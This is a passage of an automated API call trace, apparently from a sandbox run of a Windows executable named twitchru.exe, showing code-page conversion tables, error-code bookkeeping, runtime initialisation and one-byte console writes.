f5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x18\x53\x57\x0a\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0069.485] GetLastError () returned 0x0 [0069.485] SetLastError (dwErrCode=0x0) [0069.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0069.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x18\x53\x57\x0a\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0069.485] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x440650, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0069.485] GetLastError () returned 0x0 [0069.485] SetLastError (dwErrCode=0x0) [0069.485] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.486] SetLastError (dwErrCode=0x0) [0069.486] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.487] SetLastError (dwErrCode=0x0) [0069.487] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.488] SetLastError (dwErrCode=0x0) [0069.488] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.489] SetLastError (dwErrCode=0x0) [0069.489] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.490] SetLastError (dwErrCode=0x0) [0069.490] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.491] SetLastError (dwErrCode=0x0) [0069.491] GetLastError () returned 0x0 [0069.492] SetLastError (dwErrCode=0x0) [0069.492] GetLastError () returned 0x0 [0069.492] SetLastError (dwErrCode=0x0) [0069.492] GetLastError () returned 0x0 [0069.492] SetLastError (dwErrCode=0x0) [0069.492] GetLastError () returned 0x0 [0069.492] SetLastError (dwErrCode=0x0) [0069.493] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75260000 [0069.493] GetProcAddress (hModule=0x75260000, lpProcName="IsProcessorFeaturePresent") returned 0x75279680 [0069.493] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0069.495] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x427e10) returned 0x0 [0069.497] GetLastError () returned 0x0 [0069.497] SetLastError (dwErrCode=0x0) [0069.497] GetLastError () returned 0x0 [0069.497] SetLastError (dwErrCode=0x0) [0069.498] GetLastError () returned 0x0 [0069.498] SetLastError (dwErrCode=0x0) [0069.498] GetLastError () returned 0x0 [0069.498] SetLastError (dwErrCode=0x0) [0069.498] GetLastError () returned 0x0 [0069.498] SetLastError (dwErrCode=0x0) [0069.498] GetLastError () returned 0x0 [0069.499] SetLastError (dwErrCode=0x0) [0069.499] GetLastError () returned 0x0 [0069.499] SetLastError (dwErrCode=0x0) [0069.499] GetLastError () returned 0x0 [0069.499] SetLastError (dwErrCode=0x0) [0069.499] GetLastError () returned 0x0 [0069.499] SetLastError (dwErrCode=0x0) [0069.499] GetLastError () returned 0x0 [0069.499] SetLastError (dwErrCode=0x0) [0069.499] GetLastError () returned 0x0 [0069.499] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.502] SetLastError (dwErrCode=0x0) [0069.502] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.503] SetLastError (dwErrCode=0x0) [0069.503] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.504] SetLastError (dwErrCode=0x0) [0069.504] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.505] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.505] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.505] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.505] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.505] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.505] GetLastError () returned 0x0 [0069.505] SetLastError (dwErrCode=0x0) [0069.506] GetLastError () returned 0x0 [0069.506] SetLastError (dwErrCode=0x0) [0069.506] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0069.506] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0069.507] GetLastError () returned 0x0 [0069.507] SetLastError (dwErrCode=0x0) [0069.507] GetLastError () returned 0x0 [0069.507] SetLastError (dwErrCode=0x0) [0069.507] GetLastError () returned 0x0 [0069.507] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.508] GetLastError () returned 0x0 [0069.508] SetLastError (dwErrCode=0x0) [0069.509] GetLastError () returned 0x0 [0069.509] SetLastError (dwErrCode=0x0) [0069.509] GetLastError () returned 0x0 [0069.509] SetLastError (dwErrCode=0x0) [0069.509] GetLastError () returned 0x0 [0069.509] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.510] GetLastError () returned 0x0 [0069.510] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.511] GetLastError () returned 0x0 [0069.511] SetLastError (dwErrCode=0x0) [0069.512] GetLastError () returned 0x0 [0069.512] SetLastError (dwErrCode=0x0) [0069.512] GetLastError () returned 0x0 [0069.512] SetLastError (dwErrCode=0x0) [0069.512] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0069.512] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0069.513] GetLastError () returned 0x0 [0069.513] SetLastError (dwErrCode=0x0) [0069.513] GetLastError () returned 0x0 [0069.513] SetLastError (dwErrCode=0x0) [0069.513] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.513] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.530] GetLastError () returned 0x0 [0069.530] SetLastError (dwErrCode=0x0) [0069.530] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0069.531] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0069.531] GetLastError () returned 0x0 [0069.531] SetLastError (dwErrCode=0x0) [0069.531] GetLastError () returned 0x0 [0069.531] SetLastError (dwErrCode=0x0) [0069.531] GetLastError () returned 0x0 [0069.531] SetLastError (dwErrCode=0x0) [0069.531] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0069.532] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0069.532] GetLastError () returned 0x0 [0069.532] SetLastError (dwErrCode=0x0) [0069.532] GetLastError () returned 0x0 [0069.532] SetLastError (dwErrCode=0x0) [0069.532] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0069.533] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, 